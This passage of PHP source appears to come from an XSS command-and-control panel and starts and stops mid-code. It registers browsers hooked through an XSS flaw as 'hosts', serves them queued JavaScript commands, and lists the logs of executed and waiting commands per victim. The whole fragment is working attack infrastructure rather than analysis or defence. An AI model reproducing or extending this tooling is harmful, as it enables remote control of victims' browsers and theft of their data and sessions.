header('Content-Type: text/javascript; charset=utf-8'); die("/*null*/"); } if (strlen($uri[3]) != 50) { header('Content-Type: text/javascript; charset=utf-8'); die("/*null*/"); } $sid = $uri[3]; // XSS漏洞页字符串ID $pmxProj = new pmxProject(); $pmxHost = new pmxHost(); if ($pmxProj->isExistSaltID($saltid) == FALSE) { header('Content-Type: text/javascript; charset=utf-8'); die("/*null*/"); } $pid = $pmxProj->getIDbySlatID($saltid); /** * 判断是否第一次上线 */ if ($pmxHost->isExistSaltID($sid) == FALSE) { $pmxHost->addHost($pid, $sid); // 添加主机 } else { $pmxHost->updateHost($sid); // 更新主机信息 } $command = $pmxHost->getCommand($sid); if ($command) { header('Content-Type: text/javascript; charset=utf-8'); echo $command; }
if (!pmx_validate_token()) { die("Token is incorrect."); } $type_allow = array("executed", "waiting"); // 允许的类型 $sid = isset($_GET["sid"]) ? $_GET["sid"] : NULL; $type = isset($_GET["type"]) ? $_GET["type"] : NULL; $top = isset($_GET["top"]) ? intval($_GET["top"]) : 10; if ($sid == NULL || $type == NULL) { json_out(0, "sid or type couldn't be NULL."); } if (!in_array($type, $type_allow)) { json_out(0, "Type is invalid."); } $pmxHost = new pmxHost(); if (!$pmxHost->isExistSaltID($sid)) { json_out(0, "sid is non-existent."); } if ($type == "executed") { $hostExecutedLogs = $pmxHost->getExecutedLogs($sid); if (!count($hostExecutedLogs) > 0) { json_out(1, "", "<p><center>Empty</center></p>"); } $html = ""; $index = 0; foreach ($hostExecutedLogs as $hostExecutedLogs_item) { if ($index >= $top) { break; } $index++; $resp = json_decode($hostExecutedLogs_item['resp'], TRUE);